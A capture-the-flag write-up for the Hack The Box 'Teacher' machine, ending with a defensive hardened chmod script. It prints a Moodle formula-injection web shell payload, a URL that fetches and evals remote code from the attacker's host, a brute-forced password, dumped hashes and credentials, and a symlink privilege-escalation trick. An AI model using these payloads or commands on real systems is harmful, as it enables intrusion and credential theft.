Writeup: Hack The Box - Machines - Teacher

Description

  • Name: Teacher
  • IP: 10.10.10.153
  • Author: Gioo
  • Difficulty: 4.2/10

Discovery

```
nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.153
```

```
PORT   STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```
```
MOODLE:
[11:50:36] 301 - 310B - /css -> http://10.10.10.153/css/
[11:50:38] 301 - 312B - /fonts -> http://10.10.10.153/fonts/
[11:50:40] 301 - 313B - /images -> http://10.10.10.153/images/
[11:50:40] 200 - 8KB - /index.html
[11:50:41] 301 - 317B - /javascript -> http://10.10.10.153/javascript/
[11:50:41] 301 - 309B - /js -> http://10.10.10.153/js/
[11:50:42] 301 - 313B - /manual -> http://10.10.10.153/manual/
[11:50:43] 200 - 626B - /manual/index.html
[11:50:43] 301 - 313B - /moodle -> http://10.10.10.153/moodle/
[11:50:46] 403 - 297B - /phpmyadmin
[11:50:46] 403 - 298B - /phpmyadmin/
[11:50:46] 403 - 315B - /phpmyadmin/scripts/setup.php
[11:50:48] 403 - 300B - /server-status
[11:50:48] 403 - 301B - /server-status/

[+] Plugins found:
forum http://10.10.10.153/moodle/mod/forum/
http://10.10.10.153/moodle/mod/forum/upgrade.txt
http://10.10.10.153/moodle/mod/forum/version.php

[+] Themes found:
bootstrapbase http://10.10.10.153/moodle/theme/bootstrapbase/
http://10.10.10.153/moodle/theme/bootstrapbase/README.txt
http://10.10.10.153/moodle/theme/bootstrapbase/upgrade.txt
http://10.10.10.153/moodle/theme/bootstrapbase/version.php
clean http://10.10.10.153/moodle/theme/clean/
http://10.10.10.153/moodle/theme/clean/README.txt
http://10.10.10.153/moodle/theme/clean/version.php
more http://10.10.10.153/moodle/theme/more/
http://10.10.10.153/moodle/theme/more/version.php

[+] Possible version(s):
3.3.0
3.3.0-beta
3.3.0-rc1
3.3.0-rc2
3.3.0-rc3
3.3.1
3.3.2
3.3.3
3.3.4
3.3.5
3.3.6
3.3.7

[+] Possible interesting urls found:
Static readme file. - http://10.10.10.153/moodle/README.txt
Admin panel - http://10.10.10.153/moodle/login/
```

Pwn

The website is running the Moodle CMS, and the gallery page contains a suspicious, hand-crafted element:

Downloading 5.png shows that it is not an image at all but a text file:

```
http http://10.10.10.153/images/5.png

HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 200
Content-Type: image/png
Date: Sun, 23 Dec 2018 13:44:03 GMT
ETag: "c8-56f95bd633644"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 27 Jun 2018 01:43:21 GMT
Server: Apache/2.4.25 (Debian)

Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni
```

Using hydra it is possible to brute-force the login (http://10.10.10.153/moodle/login/index.php) and recover the single missing character of the password for the user giovanni (Th4C00lTheacha#).

Once logged in, it is possible to exploit the Moodle platform through a code injection in a formula field; the vulnerability is known as Evil Teacher, since it lets a non-privileged (teacher) account execute arbitrary code on the server.

Following the PoC, it is possible to create a web shell by inserting /*{a*/``$_GET[0]``;//{x}} as the formula.

With the Metasploit web_delivery module it is then easy to get a session:

http://10.10.10.153/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=16&wizardnow=datasetitems&cmid=7&0=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://10.10.XX.XX:8080/CglmLwY%27));%22

The session runs as the www-data user, but from there we can query MySQL and dump all the password hashes for the Moodle logins. The MySQL password for the root user is visible in the Moodle installation folder and is Welkom1!.

The list of hashes found:

```
username: guest
password: $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO
username: admin
password: $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2
username: giovanni
password: $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO
username: Giovannibak
password: 7a860966115182402ed06375cf0a22af
```

The last one is an unsalted MD5 hash (the others are bcrypt) and by far the easiest to crack: using the rockyou wordlist with hashcat, the password is recovered: expelled.

This password can be used to su to giovanni from www-data.

As giovanni it is possible to read the first flag and move on to the privilege escalation phase. Inside the /home/giovanni/work directory there are some files suggesting that a backup script runs on the system to save information about a course.

Searching with find / -name '*backup*' 2> /dev/null turns up /usr/bin/backup.sh, in which a please-never-do instruction jumps out.

```
giovanni@teacher:~$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
```

By creating a simple symbolic link in the tmp directory with ln -s /root test, it is possible to abuse the chmod instruction: the * glob hands the link to chmod as a command-line argument, and chmod dereferences symlinks given on its command line, so the permissions of the /root directory itself are opened up and every user can read the flag.

After a few minutes the script had changed the permissions through /home/giovanni/work/tmp/test -> /root.
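The root cause above is a privileged recursive chmod over a directory that an unprivileged user controls. As an added example (not part of the original writeup or the box), here is a symlink-aware replacement for that step: it canonicalises every symlink under the work tree, refuses to run if any of them resolves outside the tree, and then changes modes only on real files and directories, never through a link. The function names and the 750 mode are my own choices.

```shell
#!/bin/sh
# Hypothetical hardened replacement for the "chmod 777 * -R" line in backup.sh.
# GNU chmod never follows symlinks while recursing, but it DOES dereference a
# symlink passed as an argument, which is exactly what the * glob hands it.

# Return 0 (true) if $1 is a symlink whose resolved target lies outside the
# directory $2; return 1 otherwise (regular entry, or a link staying inside).
escapes_base() {
  path="$1"
  base=$(readlink -f -- "$2") || return 0
  [ -L "$path" ] || return 1
  # A dangling link cannot be resolved: treat it as escaping (fail closed).
  target=$(readlink -f -- "$path") || return 0
  case "$target/" in
    "$base"/*) return 1 ;;
    *)         return 0 ;;
  esac
}

# Recursively apply mode $2 under directory $1, but only to regular files and
# directories that physically live there. Exit status: 0 ok, 1 refused
# because a symlink points outside the tree, 2 base directory unusable.
safe_chmod_tree() {
  base=$(readlink -f -- "$1") || return 2
  [ -d "$base" ] || return 2
  mode="$2"
  # Collect every symlink that resolves outside $base (find -P, the default,
  # does not descend into links, so a link to /root is inspected, not walked).
  bad=$(find "$base" -type l | while IFS= read -r p; do
          escapes_base "$p" "$base" && printf '%s\n' "$p"
        done)
  if [ -n "$bad" ]; then
    printf 'refusing to chmod, symlink leaves %s:\n%s\n' "$base" "$bad" >&2
    return 1
  fi
  # Skip -type l entirely: chmod on a link would act on the link's target.
  find "$base" ! -path "$base" \( -type f -o -type d \) \
       -exec chmod "$mode" {} +
}

# Constructed usage mirroring the writeup's layout (work/tmp), not a real path.
# safe_chmod_tree /home/giovanni/work/tmp 750
```

A link such as tmp/test -> /root now makes the script bail out and log the offending link instead of silently handing out /root. Running the backup as a dedicated low-privilege user rather than root removes the impact entirely.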